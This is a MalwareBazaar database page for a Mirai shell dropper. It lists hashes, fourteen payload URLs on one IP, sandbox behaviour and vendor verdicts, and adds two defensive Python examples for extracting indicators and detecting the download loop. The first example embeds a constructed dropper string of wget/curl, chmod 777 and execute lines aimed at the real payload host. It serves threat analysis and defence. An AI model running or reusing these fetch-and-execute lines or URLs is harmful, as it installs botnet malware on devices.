MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 c37b76b9762846aa610a10483057bf4e6c6cdad1277a62045bbbdb8ee98595f1. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: Mirai
Vendor detections: 9

SHA256 hash: c37b76b9762846aa610a10483057bf4e6c6cdad1277a62045bbbdb8ee98595f1
SHA3-384 hash: f5bb648f9d3e4012196916bf8cfc2d262d60716d74a938c2871774b17ce0a4b36833f2223bd5abbd61a503a62519c69b
SHA1 hash: 39a8d69e14f8b9b818dc8b2393c12a3e2ee8e2c9
MD5 hash: 48fc8afa23e4010e6c8f59ddd0ef4e08
humanhash: sierra-orange-december-rugby
File name: yarn
Signature: Mirai
File size: 4'816 bytes
First seen: 2025-11-24 17:59:19 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 48:vUhMV4klUq1V4RUrHrWV4cUNoV4aUEpEEV4EeUJkV4+Uq1V4RUOZV49UzSV4sUDG:vb7pWPPLDzOEpebNZabEDfjl10DADdRv
TLSH: T1E3A10AE674B4A77A6DB0ED7371D6C642B14061AAE0DA8C0BF3D1F0E8054EF61F484B82
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1)
      30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: abuse_ch
Tags: mirai sh
Payload URLs dropped by this script (each row: URL | malware sample SHA256 hash | signature | tags):

URL | Malware sample (SHA256 hash) | Signature | Tags
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86 | 06f6c2e48fe50cc39e412f309f22053e06db1aae20c68452dbc0c813bacfaa97 | Mirai | elf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips | abb44bb778d3eb33722c8ff7858138a4353d8f46c73995602d2d84715e295b18 | Mirai | elf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl | 9e715465d9cc0b6987d27bc3bdc7abe122bca168ff708d2ec0c2441263ad70fe | Mirai | elf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm | 2de20b3347d90622f88ecd1675c009ab4b3a00eb12b454f72bc30d8f37511c26 | Mirai | elf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5 | 2e1e849fc65cd435d469dcfea490d2481eff33e553e0960cd9e0456ae50c0bf9 | Mirai | elf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6 | 19f25bc863a4691eae2074524c2f6624e9a735920f19d0adb745870addce4aa0 | Mirai | elf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7 | da87a874b834cfb9fc525ce39cd6c8ac65e118c0f401a9fbe9107bdc9c61dbe2 | Mirai | elf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc | 961a10b6fcdd3bf9cb2eb496ea4458bac31b6891f1cdce4af92b3aa6dfa9e93f | Mirai | elf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k | f4b928db067a0faa140e8fa79a2338315d998130414088617eaac7cc216872f7 | Mirai | elf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc | 44ab9070ccf7753d5e0cd3eba8625f2eed3e4f382bcb5789049efd299d84e633 | Mirai | elf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686 | f9d11add2e36cc30580e4e9ff6886a4235188b9132ce02f127ed02b06b578eee | Mirai | elf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4 | 79e05b52966b9df23bd75d3b953b346c354916469522876a7f1bc653f8146261 | Mirai | elf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc | 294e36334bce82e0ea0289773fb352aa6ebc5d3572d2d15839846a953c9469c4 | Mirai | elf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86_64 | n/a | n/a | n/a

All 14 payload URLs share the same host (158.94.210.88, plain HTTP on port 80) and the same path prefix; only the architecture suffix after the final dot differs. The x86_64 payload was not available for download when the dropper was collected, so no sample hash is recorded for it.
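As an added triage example (not MalwareBazaar code and not the `yarn` sample itself), the script below pulls every download URL out of a Mirai-style shell dropper, groups the payloads by architecture suffix, and emits the host and path IOCs a defender would block or hunt for. The embedded DROPPER text is constructed for illustration: its 14 URLs are the ones in the table above and its wget/curl, cat, chmod, execute sequence follows the sandbox process graph further down this page, but the real sample's shell lines are not reproduced, and the `-O`/`-o` file names, the `yarn` argument and the `rm -f` cleanup are assumptions.

```python
"""Static triage of a Mirai-style shell dropper: extract download URLs,
group payloads by architecture suffix, and emit host/path IOCs.

Added example; not MalwareBazaar code and not the 'yarn' sample itself.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# The 14 architecture suffixes in the page's payload table.
ARCH_SUFFIXES = ("x86", "mips", "mpsl", "arm", "arm5", "arm6", "arm7", "ppc",
                 "m68k", "spc", "i686", "sh4", "arc", "x86_64")
_BASE = ("http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/"
         "db0fa4b8db0333367e9bda3ab68b8042.")

# Constructed dropper body (assumption: one unrolled line per architecture,
# following the wget -> curl -> cat -> chmod -> execute pattern of the graph).
DROPPER = "#!/bin/bash\ncd /tmp || cd /var/run || cd /dev/shm || cd /mnt\n" + "".join(
    f"wget {_BASE}{a} -O {a} || curl -o {a} {_BASE}{a}; "
    f"cat {a} > .y; chmod 777 .y; ./.y yarn; rm -f {a} .y\n"
    for a in ARCH_SUFFIXES)

URL_RE = re.compile(r"\b(?:https?|ftp|tftp)://[^\s'\"`;&|<>()]+")
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b")   # +x or any mode with an execute-bearing 7
EXEC_RE = re.compile(r"(?:^|[\s;&|])\./\S+", re.M)             # ./something executed in place
CLEANUP_RE = re.compile(r"\brm\s+-[rf]+\b")


def extract_urls(script: str) -> list[str]:
    """Unique download URLs in order of first appearance; the wget and curl
    fallbacks that fetch the same URL collapse to one entry."""
    seen: list[str] = []
    for m in URL_RE.finditer(script):
        url = m.group(0).rstrip(".,")
        if url not in seen:
            seen.append(url)
    return seen


def payloads_by_arch(urls: list[str]) -> dict[str, str]:
    """Map architecture suffix -> URL for URLs whose basename ends in a known suffix."""
    out: dict[str, str] = {}
    for url in urls:
        basename = urlsplit(url).path.rsplit("/", 1)[-1]
        if "." in basename:
            suffix = basename.rsplit(".", 1)[-1]
            if suffix in ARCH_SUFFIXES:
                out[suffix] = url
    return out


def host_iocs(urls: list[str]) -> dict[str, list[str]]:
    """host:port -> sorted list of distinct URL paths served from it."""
    paths: dict[str, set[str]] = defaultdict(set)
    for url in urls:
        parts = urlsplit(url)
        port = parts.port or (443 if parts.scheme == "https" else 80)
        paths[f"{parts.hostname}:{port}"].add(parts.path)
    return {h: sorted(p) for h, p in paths.items()}


def stage_flags(script: str) -> dict[str, bool]:
    """Which links of the download -> chmod -> execute -> cleanup chain are present."""
    return {
        "fetch": bool(FETCH_RE.search(script)),
        "chmod": bool(CHMOD_RE.search(script)),
        "exec": bool(EXEC_RE.search(script)),
        "cleanup": bool(CLEANUP_RE.search(script)),
    }


def triage(script: str) -> dict:
    """Full report: URLs, per-architecture payloads, host IOCs and stage flags."""
    urls = extract_urls(script)
    return {
        "urls": urls,
        "by_arch": payloads_by_arch(urls),
        "hosts": host_iocs(urls),
        "stages": stage_flags(script),
    }


if __name__ == "__main__":
    report = triage(DROPPER)
    print(f"{len(report['urls'])} download URLs; architectures: {', '.join(report['by_arch'])}")
    for host, paths in report["hosts"].items():
        print(f"  {host}: {len(paths)} distinct paths")
    print("  stages:", report["stages"])
```

Run it against a real dropper by reading the file into `triage()` instead of `DROPPER`; the host list is what goes into a blocklist, and the per-architecture map tells you which ELF payloads to pull for your own platforms. The regexes deliberately stay broad (tftp, ftpget, any mode with an execute bit) because Mirai droppers vary the fetch tool and the chmod spelling far more than they vary the overall chain.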

Intelligence

File Origin
# of uploads: 1
# of downloads: 34
Origin country: DE
Vendor Threat Intelligence

Verdict: Likely Malicious
Threat level: 7.5/10
Confidence: 100%
Tags: medusa mirai

Verdict: Malicious
File Type: unix shell
First seen: 2025-11-24T15:04:00Z UTC
Last seen: 2025-11-25T00:57:00Z UTC
Hits: ~10
Detections: HEUR:Trojan-Downloader.Shell.Agent.p, HEUR:Trojan-Downloader.Shell.Agent.gen, HEUR:Trojan-Downloader.Shell.Agent.a
Status: terminated
Behavior Graph:
(process graph rendered as an image on the original page; summarised here)
  /usr/bin/sudo (pid 3224) --execve--> /tmp/sample.bin (pid 3228)
  /tmp/sample.bin (pid 3228) then repeats the following cycle 14 times, once per payload architecture (child pids 3229 through 3771):
    execve /usr/bin/wget   (net, send-data)              -> 158.94.210.88:80, 197 to 200 B sent
    execve /usr/bin/curl   (net, send-data, write-file)  -> 158.94.210.88:80, 146 to 149 B sent
    execve /usr/bin/cat
    execve /usr/bin/chmod
    clone  /usr/bin/bash
  Every outbound connection in the graph goes to the single host 158.94.210.88:80; the payload sizes sent (one short HTTP request per wget or curl invocation) are consistent with a plain GET for each architecture-specific binary.
Threat name: Linux.Downloader.Medusa
Status: Malicious
First seen: 2025-11-24 18:00:39 UTC
File Type: Text (Shell)
AV detection: 23 of 36 (63.89%)
Threat level: 3/5

Result
Malware family: n/a
Score: 7/10
Tags: antivm defense_evasion discovery linux
Behaviour:
  Reads runtime system information
  System Network Configuration Discovery
  Writes file to tmp directory
  Checks CPU configuration
  File and Directory Permissions Modification
  Executes dropped EXE

Please note that we are no longer able to provide a coverage score for Virus Total.
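The sandbox process graph above is the behavioural signature a defender can key on: one shell process repeatedly spawning a fetch tool that talks to a single literal IP on port 80, each fetch followed by chmod, fourteen times over. The detection below is an added example (not sandbox, EDR or MalwareBazaar code). Its EVENTS stream is a hand-built abstraction of the page's graph: the parent pid 3228, the child binaries and the 158.94.210.88:80 destination are taken from the graph, while the timestamps, the generated child pids and the benign control process (an installer doing one HTTPS fetch by hostname) are assumptions. A real deployment would feed auditd or eBPF execve and connect records in the same shape.

```python
"""Process-tree detection for the wget/curl -> chmod loop of a multi-arch
Mirai dropper, as shown in the sandbox graph on this page.

Added example; not sandbox, EDR or MalwareBazaar code.
"""
import ipaddress
from collections import defaultdict

FETCH_TOOLS = {"/usr/bin/wget", "/usr/bin/curl", "/usr/bin/tftp", "/usr/bin/ftpget"}


def _event(ts, pid, ppid, exe, action, dst=None):
    return {"ts": ts, "pid": pid, "ppid": ppid, "exe": exe, "action": action, "dst": dst}


def build_events():
    """Constructed event stream: 14 download cycles under pid 3228 (as in the
    page's graph) plus one benign process that does a single HTTPS fetch by
    hostname and a chmod, which must not fire. Timestamps/pids are assumed."""
    events = [_event(0, 3228, 3224, "/tmp/sample.bin", "execve")]
    ts, pid = 1, 3229
    for _ in range(14):  # wget, curl, cat, chmod, bash clone - the graph's cycle
        events.append(_event(ts, pid, 3228, "/usr/bin/wget", "execve", "158.94.210.88:80"))
        events.append(_event(ts + 1, pid + 1, 3228, "/usr/bin/curl", "execve", "158.94.210.88:80"))
        events.append(_event(ts + 2, pid + 2, 3228, "/usr/bin/cat", "execve"))
        events.append(_event(ts + 3, pid + 3, 3228, "/usr/bin/chmod", "execve"))
        events.append(_event(ts + 4, pid + 4, 3228, "/usr/bin/bash", "clone"))
        ts, pid = ts + 5, pid + 5
    # Benign control (assumed): an installer fetching one file by DNS name.
    events.append(_event(ts, 4000, 1, "/usr/bin/bash", "execve"))
    events.append(_event(ts + 1, 4001, 4000, "/usr/bin/curl", "execve", "dl.example.org:443"))
    events.append(_event(ts + 2, 4002, 4000, "/usr/bin/chmod", "execve"))
    return events


def _is_public_literal_ip(hostport: str) -> bool:
    """True only for a literal, globally routable IP (Mirai C2/loader hosts
    are almost always raw IPs); DNS names and RFC1918/loopback return False."""
    host = hostport.rsplit(":", 1)[0]
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return False


def detect_multiarch_dropper(events, min_cycles=3):
    """One finding per parent process showing >= min_cycles ordered
    fetch -> chmod pairs where the fetches target a literal public IP."""
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev["ppid"]].append(ev)

    findings = []
    for ppid, evs in by_parent.items():
        evs.sort(key=lambda e: e["ts"])
        cycles, pending_fetch, c2 = 0, False, set()
        for e in evs:
            if e["exe"] in FETCH_TOOLS and e["dst"] and _is_public_literal_ip(e["dst"]):
                pending_fetch = True       # a second fallback fetch (curl after wget) is still one cycle
                c2.add(e["dst"])
            elif e["exe"] == "/usr/bin/chmod" and pending_fetch:
                cycles += 1
                pending_fetch = False
        if cycles >= min_cycles:
            findings.append({
                "parent_pid": ppid,
                "cycles": cycles,
                "c2": sorted(c2),
                "fetch_tools": sorted({e["exe"] for e in evs if e["exe"] in FETCH_TOOLS}),
            })
    return findings


if __name__ == "__main__":
    for f in detect_multiarch_dropper(build_events()):
        print(f"dropper loop under pid {f['parent_pid']}: "
              f"{f['cycles']} fetch->chmod cycles via {f['c2']} using {f['fetch_tools']}")
```

The threshold of three cycles is a tuning choice: a single fetch-then-chmod is what every curl-pipe installer does, but repeating it against one raw IP for a dozen architectures is characteristic of IoT droppers that do not know the target's CPU and simply try every binary. Restricting to literal public IPs cuts most package-manager and CDN noise; if your environment legitimately pulls binaries from bare IPs, allowlist those destinations rather than raising the threshold.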

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Linux_Shellscript_Downloader
Author: albertzsigovits
Description: Generic Approach to Shellscript downloaders

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download (distributed via web download)
Signature: Mirai
Sample: sh c37b76b9762846aa610a10483057bf4e6c6cdad1277a62045bbbdb8ee98595f1 (this sample)

Comments